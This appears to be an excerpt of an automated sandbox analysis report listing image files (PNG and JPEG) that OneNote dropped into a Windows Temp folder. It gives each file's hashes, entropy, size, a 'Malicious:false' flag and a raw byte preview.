                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3C6250FB-318E-4BDD-860D-BD8290D12AB6}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3D0F540F-6193-43EA-BBCB-F5274EF6CF31}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3D1E7E2C-1E07-411C-9733-ADE79B0BDD16}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3FF4F276-9AC0-4F68-8F39-56CEC34A814E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14177
                                                                                                                                                                                                                  Entropy (8bit):5.705782002886174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                                  MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                                  SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                                  SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                                  SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4059F6AF-344E-432E-B08A-104C1B006045}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{434F7D2D-91B4-43E8-86FC-AE2CD40DA2CC}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{43575BDF-D200-49D0-AA54-D0F9C9F6FF28}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{44789F78-73C4-40B1-A031-568933ED3955}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{44C26739-CA4B-4BE5-AF2D-CB9B3A8EBB7F}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59832
                                                                                                                                                                                                                  Entropy (8bit):7.308211468398169
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                                  MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                                  SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                                  SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                                  SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4604EF6B-C966-4EEA-B700-AD3B1315FEC2}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2695
                                                                                                                                                                                                                  Entropy (8bit):7.434963358385164
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                                                                                                                                  MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                                                                                                                                  SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                                                                                                                                  SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                                                                                                                                  SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4717DBBC-6EBE-429A-BEE0-A57FF1629C65}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{49C8B643-9173-4AC4-82E3-2FDBD12B3EBA}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
